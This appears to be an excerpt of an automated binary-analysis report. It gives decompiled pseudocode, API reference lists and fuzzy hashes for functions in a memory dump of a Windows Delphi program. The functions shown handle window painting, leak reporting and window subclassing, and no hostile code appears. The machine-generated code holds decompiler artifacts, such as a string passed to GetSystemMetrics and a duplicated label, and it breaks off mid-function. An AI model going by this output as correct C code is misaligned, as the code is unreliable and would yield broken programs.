                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message$Window$Register$Send$Find
                                                                            • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                            • API String ID: 3569030445-3736581797
                                                                            • Opcode ID: 10a1feeb794df7440b17b8e63e4a13679fef9cef35fe56b70c938976079f5b51
                                                                            • Instruction ID: c9e55c20fdb79de714cfc477ac30daadf041c9ce3ed2a91509b04cc45838add5
                                                                            • Opcode Fuzzy Hash: 10a1feeb794df7440b17b8e63e4a13679fef9cef35fe56b70c938976079f5b51
                                                                            • Instruction Fuzzy Hash: 9A111F70A48305AFE710AF65CC81B66BBA8EF45714F204177F944AB3C1D6B86D418B6A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
E0042E248(void* __eax, void* __ecx, intOrPtr __edx) {
    intOrPtr _v8;
    struct HDC__* _v12;
    struct tagRECT _v28;
    struct tagRECT _v44;
    char _v56;
    char _v72;
    signed char _t43;
    signed int _t79;
    int _t80;
    int _t81;
    void* _t94;
    intOrPtr _t107;
    void* _t116;
    void* _t119;
    void* _t122;
    void* _t124;
    intOrPtr _t125;

    _t122 = _t124;
    _t125 = _t124 + 0xffffffbc;
    _t94 = __ecx;
    _v8 = __edx;
    _t116 = __eax;
    _t43 = GetWindowLongA(E004423F8(_v8), 0xffffffec);
    if((_t43 & 0x00000002) == 0) {
        return _t43;
    } else {
        GetWindowRect(E004423F8(_v8), &_v44);
        OffsetRect( &_v44, ~(_v44.left), ~(_v44.top));
        _v12 = GetWindowDC(E004423F8(_v8));
        _push(_t122);
        _push(0x42e3a3);
        _push( *[fs:edx]);
        *[fs:edx] = _t125;
        asm("movsd");
        asm("movsd");
        asm("movsd");
        asm("movsd");
        _t119 = _t116;
        if(_t94 != 0) {
            _t79 = GetWindowLongA(E004423F8(_v8), 0xfffffff0);
            if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
                _t80 = GetSystemMetrics("true");
                _t81 = GetSystemMetrics(3);
                InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                E004193B4(_v28.right - _t80, _v28.right, _v28.bottom - _t81, &_v72, _v28.bottom);
                asm("movsd");
                asm("movsd");
                asm("movsd");
                asm("movsd");
                _t119 = _t119;
                FillRect(_v12, &_v28, GetSysColorBrush(0xf));
            }
        }
        ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
        E0042DDE4( &_v56, 2);
        E0042DD38(_t119, &_v56, _v12, 0, &_v44);
        _pop(_t107);
        *[fs:eax] = _t107;
        _push(0x42e3aa);
        return ReleaseDC(E004423F8(_v8), _v12);
    }
}

                                                                            APIs
                                                                            • GetWindowLongA.USER32 ref: 0042E263
                                                                            • GetWindowRect.USER32 ref: 0042E27E
                                                                            • OffsetRect.USER32(?,?,?), ref: 0042E293
                                                                            • GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E2A1
                                                                            • GetWindowLongA.USER32 ref: 0042E2D2
                                                                            • GetSystemMetrics.USER32 ref: 0042E2E7
                                                                            • GetSystemMetrics.USER32 ref: 0042E2F0
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0042E2FF
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0042E32C
                                                                            • FillRect.USER32 ref: 0042E33A
                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0042E3A3,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E35F
                                                                            • ReleaseDC.USER32 ref: 0042E39D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                                                            • String ID:
                                                                            • API String ID: 19621357-0
                                                                            • Opcode ID: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3
                                                                            • Instruction ID: 957c21c96a165308dc8ebfbd5cc34ddb946f70638fe63c8bb3f5cff5665369c4
                                                                            • Opcode Fuzzy Hash: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3
                                                                            • Instruction Fuzzy Hash: 71413371E04119ABDB00EBA9DD42EDFB7BDEF49314F500166F914F7281CA79AE018764
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
E0040262C(void* __eax, void* __fp0) {
    void* _v8;
    char _v110600;
    char _v112644;
    char _v112645;
    signed int _v112652;
    char _v112653;
    char _v112654;
    char _v112660;
    intOrPtr _v112664;
    intOrPtr _v112668;
    intOrPtr _v112672;
    struct HWND__* _v112676;
    signed short* _v112680;
    intOrPtr* _v112684;
    char _v129068;
    char _v131117;
    char _v161836;
    void* _v162091;
    signed char _v162092;
    void* _t73;
    int _t79;
    signed int _t126;
    int _t131;
    intOrPtr _t132;
    char* _t134;
    char* _t135;
    char* _t136;
    char* _t137;
    char* _t138;
    char* _t139;
    char* _t141;
    char* _t142;
    char* _t147;
    char* _t148;
    intOrPtr _t179;
    void* _t181;
    void* _t183;
    void* _t184;
    intOrPtr* _t187;
    intOrPtr* _t188;
    signed int _t193;
    void* _t196;
    void* _t197;
    void* _t210;

    _push(__eax);
    _t73 = 0x27;
    goto L1;
    L12:
    while(_t179 != 0x463708) {
        _t79 = E00402144(_t179);
        _t131 = _t79;
        __eflags = _t131;
        if(_t131 == 0) {
            L11:
            _t179 = *((intOrPtr*)(_t179 + 4));
            continue;
        } else {
            goto L4;
        }
        do {
            L4:
            _t193 = *(_t131 - 4);
            __eflags = _t193 & 0x00000001;
            if((_t193 & 0x00000001) == 0) {
                __eflags = _t193 & 0x00000004;
                if(__eflags == 0) {
                    __eflags = _v112652 - 0x1000;
                    if(_v112652 < 0x1000) {
                        _v112664 = (_t193 & 0xfffffff0) - 4;
                        _t126 = E00402488(_t131, _t164);
                        __eflags = _t126;
                        if(_t126 == 0) {
                            _v112645 = 0;
                            _t164 = _v112664;
                            *((intOrPtr*)(_t196 + _v112652 * 4 - 0x1f828)) = _v112664;
                            _t18 = &_v112652;
                            *_t18 = _v112652 + 1;
                            __eflags = *_t18;
                        }
                    }
                } else {
                    E004024E0(_t131, __eflags, _t196);
                }
            }
            _t79 = E00402120(_t131);
            _t131 = _t79;
            __eflags = _t131;
        } while (_t131 != 0);
        goto L11;
    }
    _t132 = *0x4657b0; // 0x4657ac
    while(_t132 != 0x4657ac && _v112652 < 0x1000) {
        _t79 = E00402488(_t132 + 0x10, _t164);
        __eflags = _t79;
        if(_t79 == 0) {
            _v112645 = 0;
            _t22 = _t132 + 0xc; // 0x0
            _t79 = _v112652;
            *((intOrPtr*)(_t196 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
            _t27 = &_v112652;
            *_t27 = _v112652 + 1;
            __eflags = *_t27;
        }
        _t29 = _t132 + 4; // 0x4657ac
        _t132 = *_t29;
    }
    if(_v112645 != 0) {
        L48:
        return _t79;
    }
    _v112653 = 0;
    _v112668 = 0;
    _t134 = E004022DC(0x28, &_v161836);
    _v112660 = 0x37;
    _v112680 = 0x46103e;
    _v112684 = &_v110600;
    do {
        _v112672 = ( *_v112680 & 0x0000ffff) - 4;
        _v112654 = 0;
        _t181 = 0xff;
        _t187 = _v112684;
        while(_t134 <= &_v131117) {
            if( *_t187 > 0) {
                if(_v112653 == 0) {
                    _t134 = E004022DC(0x27, _t134);
                    _v112653 = 1;
                }
                if(_v112654 != 0) {
                    *_t134 = 0x2c;
                    _t139 = _t134 + 1;
                    *_t139 = 0x20;
                    _t140 = _t139 + 1;
                    __eflags = _t139 + 1;
                } else {
                    *_t134 = 0xd;
                    *((char*)(_t134 + 1)) = 0xa;
                    _t147 = E004021C0(_v112668 + 1, _t134 + 2);
                    *_t147 = 0x20;
                    _t148 = _t147 + 1;
                    *_t148 = 0x2d;
                    *((char*)(_t148 + 1)) = 0x20;
                    _t140 = E004022DC(8, E004021C0(_v112672, _t148 + 2));
                    _v112654 = 1;
                }
                _t210 = _t181 - 1;
                if(_t210 < 0) {
                    _t141 = E004022DC(7, _t140);
                } else {
                    if(_t210 == 0) {
                        _t141 = E004022DC(6, _t140);
                    } else {
                        E00403808( *((intOrPtr*)(_t187 - 4)), &_v162092);
                        _t141 = E004022DC(_v162092 & 0x000000ff, _t140);
                    }
                }
                *_t141 = 0x20;
                _t142 = _t141 + 1;
                *_t142 = 0x78;
                *((char*)(_t142 + 1)) = 0x20;
                _t134 = E004021C0( *_t187, _t142 + 2);
            }
            _t181 = _t181 - 1;
            _t187 = _t187 - 8;
            if(_t181 != 0xffffffff) {
                continue;
            } else {
                goto L37;
            }
        }
        L37:
        _v112668 = _v112672;
        _v112684 = _v112684 + 0x800;
        _v112680 = &(_v112680[0x10]);
        _t60 = &_v112660;
        *_t60 = _v112660 - 1;
    } while ( *_t60 != 0);
    if(_v112652 <= 0) {
        L47:
        E004022DC(3, _t134);
        _t79 = MessageBoxA(0, &_v161836, "Unexpected Memory Leak", 0x2010);
        goto L48;
    }
    if(_v112653 != 0) {
        *_t134 = 0xd;
        _t136 = _t134 + 1;
        *_t136 = 0xa;
        _t137 = _t136 + 1;
        *_t137 = 0xd;
        _t138 = _t137 + 1;
        *_t138 = 0xa;
        _t134 = _t138 + 1;
    }
    _t134 = E004022DC(0x3c, _t134);
    _t183 = _v112652 - 1;
    if(_t183 >= 0) {
        _t184 = _t183 + 1;
        _v112676 = 0;
        _t188 = &_v129068;
        L43:
        L43:
        if(_v112676 != 0) {
            *_t134 = 0x2c;
            _t135 = _t134 + 1;
            *_t135 = 0x20;
            _t134 = _t135 + 1;
        }
        _t134 = E004021C0( *_t188, _t134);
        if(_t134 > &_v131117) {
            goto L47;
        }
        _v112676 = &(_v112676->i);
        _t188 = _t188 + 4;
        _t184 = _t184 - 1;
        if(_t184 != 0) {
            goto L43;
        }
    }
    L1:
    _t197 = _t197 + 0xfffff004;
    _push(_t73);
    _t73 = _t73 - 1;
    if(_t73 != 0) {
        goto L1;
    } else {
        E00403264( &_v112644, 0x1b800);
        _t164 = 0x4000;
        E00403264( &_v129068, 0x4000);
        _t79 = 0;
        _v112652 = 0;
        _v112645 = 1;
        _t179 = *0x46370c; // 0x25e0000
        goto L12;
    }
}

                                                                            0x004028da
                                                                            0x004028de
                                                                            0x004028eb
                                                                            0x004028eb
                                                                            0x004028ed
                                                                            0x004028ee
                                                                            0x004028f4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004028f4
                                                                            0x004028fa
                                                                            0x00402900
                                                                            0x00402906
                                                                            0x00402910
                                                                            0x00402917
                                                                            0x00402917
                                                                            0x00402917
                                                                            0x0040292a
                                                                            0x004029a6
                                                                            0x004029b2
                                                                            0x004029ca
                                                                            0x00000000
                                                                            0x004029ca
                                                                            0x00402933
                                                                            0x00402935
                                                                            0x00402938
                                                                            0x00402939
                                                                            0x0040293c
                                                                            0x0040293d
                                                                            0x00402940
                                                                            0x00402941
                                                                            0x00402944
                                                                            0x00402944
                                                                            0x00402956
                                                                            0x0040295e
                                                                            0x00402961
                                                                            0x00402963
                                                                            0x00402964
                                                                            0x0040296e
                                                                            0x00000000
                                                                            0x00402974
                                                                            0x0040297b
                                                                            0x0040297d
                                                                            0x00402980
                                                                            0x00402981
                                                                            0x00402984
                                                                            0x00402984
                                                                            0x0040298e
                                                                            0x00402998
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040299a
                                                                            0x004029a0
                                                                            0x004029a3
                                                                            0x004029a4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004029a4
                                                                            0x00402635
                                                                            0x00402635
                                                                            0x0040263b
                                                                            0x0040263c
                                                                            0x0040263d
                                                                            0x00000000
                                                                            0x0040263f
                                                                            0x00402658
                                                                            0x00402665
                                                                            0x0040266a
                                                                            0x0040266f
                                                                            0x00402671
                                                                            0x00402677
                                                                            0x0040267e
                                                                            0x00000000
                                                                            0x0040267e

                                                                            APIs
                                                                            • MessageBoxA.USER32 ref: 004029CA
                                                                            Strings
                                                                            • , xrefs: 00402910
                                                                            • An unexpected memory leak has occurred. , xrefs: 0040278C
                                                                            • Unexpected Memory Leak , xrefs: 004029BC
                                                                            • String , xrefs: 0040289D
                                                                            • 7 , xrefs: 0040279D
                                                                            • bytes: , xrefs: 00402859
                                                                            • Unknown , xrefs: 00402888
                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945
                                                                            • The unexpected small block leaks are: , xrefs: 00402803
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                            • API String ID: 2030045667-32948583
                                                                            • Opcode ID: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1
                                                                            • Instruction ID: 23a8accc11e2490a14215b8d9e6836f2a0164065a38b33aa7325ad77d19b5dc4
                                                                            • Opcode Fuzzy Hash: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1
                                                                            • Instruction Fuzzy Hash: 14A1D930B042548BDF21AA2DC988BD976E5EB09314F1441FAE449BB3C2DBFD89C5CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                            E0042328C(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                                                                struct tagPOINT _v12;
                                                                                int _v16;
                                                                                struct tagRECT _v32;
                                                                                struct tagRECT _v48;
                                                                                void* __ebx;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                void* __ebp;
                                                                                void* _t60;
                                                                                int _t61;
                                                                                RECT* _t64;
                                                                                struct HDC__* _t65;

                                                                                _t64 = _a8;
                                                                                _t65 = _a4;
                                                                                if( *0x46633f != 0) {
                                                                                    _t61 = 0;
                                                                                    if(_a12 == 0) {
                                                                                        L14:
                                                                                        return _t61;
                                                                                    }
                                                                                    _v32.left = 0;
                                                                                    _v32.top = 0;
                                                                                    _v32.right = GetSystemMetrics(0);
                                                                                    _v32.bottom = GetSystemMetrics(1);
                                                                                    if(_t65 == 0) {
                                                                                        if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                            L13:
                                                                                            _t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                                                                        } else {
                                                                                            _t61 = 1;
                                                                                        }
                                                                                        goto L14;
                                                                                    }
                                                                                    _v16 = GetClipBox(_t65,  &_v48);
                                                                                    if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                                                                        goto L14;
                                                                                    }
                                                                                    OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                                                                    if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                                                                        if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                            goto L13;
                                                                                        }
                                                                                        if(_v16 == 1) {
                                                                                            _t61 = 1;
                                                                                        }
                                                                                        goto L14;
                                                                                    } else {
                                                                                        goto L13;
                                                                                    }
                                                                                }
                                                                                 *0x46632c = E00422CE4(7, _t60,  *0x46632c, _t64, _t65);
                                                                                _t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                                                                goto L14;
                                                                            }


                                                                            APIs
                                                                            • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004232C5
                                                                            • GetSystemMetrics.USER32 ref: 004232EA
                                                                            • GetSystemMetrics.USER32 ref: 004232F5
                                                                            • GetClipBox.GDI32(?,?), ref: 00423307
                                                                            • GetDCOrgEx.GDI32(?,?), ref: 00423314
                                                                            • OffsetRect.USER32(?,?,?), ref: 0042332D
                                                                            • IntersectRect.USER32 ref: 0042333E
                                                                            • IntersectRect.USER32 ref: 00423354
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • EnumDisplayMonitors , xrefs: 004232A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                            • String ID: EnumDisplayMonitors
                                                                            • API String ID: 362875416-2491903729
                                                                            • Opcode ID: f7d0f23d6495af1ec55020b5116113e54d63a9552e5b96eaa14a23c035d380cf
                                                                            • Instruction ID: d52a89dab7af035f148b809b0392693c774d2fc3562edf481713e1b8ae1df2d7
                                                                            • Opcode Fuzzy Hash: f7d0f23d6495af1ec55020b5116113e54d63a9552e5b96eaa14a23c035d380cf
                                                                            • Instruction Fuzzy Hash: 82312C72E04219AFDB10DFA598449EFB7BCAB09315F40412BFD11E2241EB7CDB018BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                            E004403A0(intOrPtr* __eax, void* __edx) {
                                                                                struct HDC__* _v8;
                                                                                struct HBITMAP__* _v12;
                                                                                void* _v16;
                                                                                struct tagPAINTSTRUCT _v80;
                                                                                int _v84;
                                                                                void* _v96;
                                                                                int _v104;
                                                                                void* _v112;
                                                                                void* __ebx;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                void* __ebp;
                                                                                void* _t38;
                                                                                struct HDC__* _t59;
                                                                                intOrPtr* _t88;
                                                                                intOrPtr _t107;
                                                                                void* _t108;
                                                                                struct HDC__* _t110;
                                                                                void* _t113;
                                                                                void* _t116;
                                                                                void* _t118;
                                                                                intOrPtr _t119;

                                                                                _t116 = _t118;
                                                                                _t119 = _t118 + 0xffffff94;
                                                                                _push(_t108);
                                                                                _t113 = __edx;
                                                                                _t88 = __eax;
                                                                                if( *((char*)(__eax + 0x240)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                                                                    if(( *(_t88 + 0x55) & 0x00000001) != 0 || E0043E7F4(_t88) != 0) {
                                                                                        _t38 = L0043FDA8(_t88, _t88, _t113, _t108, _t113);
                                                                                    } else {
                                                                                        _t38 =  *((intOrPtr*)( *_t88 - 0x10))();
                                                                                    }
                                                                                    return _t38;
                                                                                } else {
                                                                                    _t110 = GetDC(0);
                                                                                     *((intOrPtr*)( *_t88 + 0x44))();
                                                                                     *((intOrPtr*)( *_t88 + 0x44))();
                                                                                    _v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
                                                                                    ReleaseDC(0, _t110);
                                                                                    _v8 = CreateCompatibleDC(0);
                                                                                    _v16 = SelectObject(_v8, _v12);
                                                                                     *[fs:eax] = _t119;
                                                                                    _t59 = BeginPaint(E004423F8(_t88),  &_v80);
                                                                                    E0043BC9C(_t88, _v8, 0x14, _v8);
                                                                                     *((intOrPtr*)(_t113 + 4)) = _v8;
                                                                                    E004403A0(_t88, _t113);
                                                                                     *((intOrPtr*)(_t113 + 4)) = 0;
                                                                                     *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x4404f2, _t116);
                                                                                     *((intOrPtr*)( *_t88 + 0x44))();
                                                                                    BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
                                                                                    EndPaint(E004423F8(_t88),  &_v80);
                                                                                    _pop(_t107);
                                                                                     *[fs:eax] = _t107;
                                                                                    _push(0x4404f9);
                                                                                    SelectObject(_v8, _v16);
                                                                                    DeleteDC(_v8);
                                                                                    return DeleteObject(_v12);
                                                                                }
                                                                            }


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 004403EB
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0044040F
                                                                            • ReleaseDC.USER32 ref: 0044041A
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00440421
                                                                            • SelectObject.GDI32(00000000,?), ref: 00440431
                                                                            • BeginPaint.USER32(00000000,?,00000000,004404F2,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00440453
                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 004404AF
                                                                            • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004404C0
                                                                            • SelectObject.GDI32(00000000,?), ref: 004404DA
                                                                            • DeleteDC.GDI32(00000000), ref: 004404E3
                                                                            • DeleteObject.GDI32(?), ref: 004404EC
                                                                              • Part of subcall function 0043FDA8: BeginPaint.USER32(00000000,?), ref: 0043FDD3
                                                                              • Part of subcall function 0043FDA8: EndPaint.USER32(00000000,?,0043FF0E), ref: 0043FF01
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                            • String ID:
                                                                            • API String ID: 3867285559-0
                                                                            • Opcode ID: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770
                                                                            • Instruction ID: 4919ca747627bef7842d7ed575d7896ae0b3c9884536c9da749fdf441052b200
                                                                            • Opcode Fuzzy Hash: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770
                                                                            • Instruction Fuzzy Hash: C1414171B00204AFDB10EFA9CD85F9EB7F8EF49704F10447ABA05EB281DA789D158B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E00437338(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                char _v8;
                                                                                void* _t29;
                                                                                void* _t32;
                                                                                void* _t38;
                                                                                void* _t42;
                                                                                void* _t46;
                                                                                void* _t54;
                                                                                intOrPtr* _t65;

                                                                                _t65 =  &_v8;
                                                                                _t29 =  *0x462560; // 0x0
                                                                                 *((intOrPtr*)(_t29 + 0x1b4)) = _a4;
                                                                                if(IsWindowUnicode(_a4) == 0) {
                                                                                    _t32 =  *0x462560; // 0x0
                                                                                    SetWindowLongA(_a4, 0xfffffffc,  *(_t32 + 0x1c0));
                                                                                    if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                                                                        SetWindowLongA(_a4, 0xfffffff4, _a4);
                                                                                    }
                                                                                } else {
                                                                                    _t54 =  *0x462560; // 0x0
                                                                                    SetWindowLongW(_a4, 0xfffffffc,  *(_t54 + 0x1c0));
                                                                                    if((GetWindowLongW(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongW(_a4, 0xfffffff4) == 0) {
                                                                                        SetWindowLongW(_a4, 0xfffffff4, _a4);
                                                                                    }
                                                                                }
                                                                                _t38 =  *0x462560; // 0x0
                                                                                SetPropA(_a4,  *0x466502 & 0x0000ffff, _t38);
                                                                                _t42 =  *0x462560; // 0x0
                                                                                SetPropA(_a4,  *0x466500 & 0x0000ffff, _t42);
                                                                                _t46 =  *0x462560; // 0x0
                                                                                 *0x462560 = 0;
                                                                                _v8 =  *((intOrPtr*)(_t46 + 0x1c0))(_a4, _a8, _a12, _a16);
                                                                                return  *_t65;
                                                                            }


                                                                            APIs
                                                                            • IsWindowUnicode.USER32(?), ref: 00437352
                                                                            • SetWindowLongW.USER32 ref: 0043736D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00437378
                                                                            • GetWindowLongW.USER32(?,000000F4), ref: 0043738A
                                                                            • SetWindowLongW.USER32 ref: 0043739D
                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 004373B6
                                                                            • GetWindowLongA.USER32 ref: 004373C1
                                                                            • GetWindowLongA.USER32 ref: 004373D3
                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 004373E6
                                                                            • SetPropA.USER32 ref: 004373FD
                                                                            • SetPropA.USER32 ref: 00437414
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Long$Prop$Unicode
                                                                            • String ID:
                                                                            • API String ID: 1693715928-0
                                                                            • Opcode ID: 9cb3877dccd50f0c78dc4fa0fa98952b877eedb7963e8443561684603e94e979
                                                                            • Instruction ID: 055e33e178d5362de7fb404685cd59e59f5cb0b042dc790f1cdf86eecf1274db
                                                                            • Opcode Fuzzy Hash: 9cb3877dccd50f0c78dc4fa0fa98952b877eedb7963e8443561684603e94e979
                                                                            • Instruction Fuzzy Hash: 62316075608248BBDF10DFA9DD84E9A37ACBB08354F104266FD14DB2E1D378EA40CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
E0043EA40(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
    char _v68;
    struct _WNDCLASSA _v108;
    intOrPtr _v116;
    signed char _v137;
    void* _v144;
    struct _WNDCLASSA _v184;
    char _v188;
    char _v192;
    char _v196;
    int _t52;
    void* _t53;
    intOrPtr _t86;
    intOrPtr _t105;
    intOrPtr _t109;
    void* _t110;
    intOrPtr* _t112;
    void* _t116;

    _t110 = __edi;
    _t94 = __ebx;
    _push(__ebx);
    _push(__esi);
    _v196 = 0;
    _t112 = __eax;
    _push(_t116);
    _push(0x43ec01);
    _push( *[fs:eax]);
    *[fs:eax] = _t116 + 0xffffff40;
    *((intOrPtr*)( *__eax + 0x9c))();
    if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
        L7:
        *((intOrPtr*)(_t112 + 0x1a8)) = _v108.lpfnWndProc;
        _t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
        asm("sbb eax, eax");
        _t53 = _t52 + 1;
        if(_t53 == 0 || E00437338 != _v184.lpfnWndProc) {
            if(_t53 != 0) {
                UnregisterClassA( &_v68, _v108.hInstance);
            }
            _v108.lpfnWndProc = E00437338;
            _v108.lpszClassName =  &_v68;
            if(RegisterClassA( &_v108) == 0) {
                E0040D764();
            }
        }
        *0x462560 = _t112;
        _t96 =  *_t112;
        *((intOrPtr*)( *_t112 + 0xa0))();
        if( *(_t112 + 0x1b4) == 0) {
            E0040D764();
        }
        if((GetWindowLongA( *(_t112 + 0x1b4), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t112 + 0x1b4), 0xfffffff4) == 0) {
            SetWindowLongA( *(_t112 + 0x1b4), 0xfffffff4,  *(_t112 + 0x1b4));
        }
        E0040927C( *((intOrPtr*)(_t112 + 0x64)));
        *((intOrPtr*)(_t112 + 0x64)) = 0;
        E00442700(_t112);
        E0043BC9C(_t112, E0042590C( *((intOrPtr*)(_t112 + 0x68)), _t94, _t96, _t110, _t112), 0x30, 1);
        _t131 =  *((char*)(_t112 + 0x5c));
        if( *((char*)(_t112 + 0x5c)) != 0) {
            E00403B24(_t112, _t131);
        }
        _pop(_t105);
        *[fs:eax] = _t105;
        _push(0x43ec08);
        return E0040473C( &_v196);
    } else {
        _t94 =  *((intOrPtr*)(__eax + 4));
        if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
            L6:
            _v192 =  *((intOrPtr*)(_t112 + 8));
            _v188 = 0xb;
            _t86 =  *0x462dec; // 0x423568
            E00406740(_t86,  &_v196);
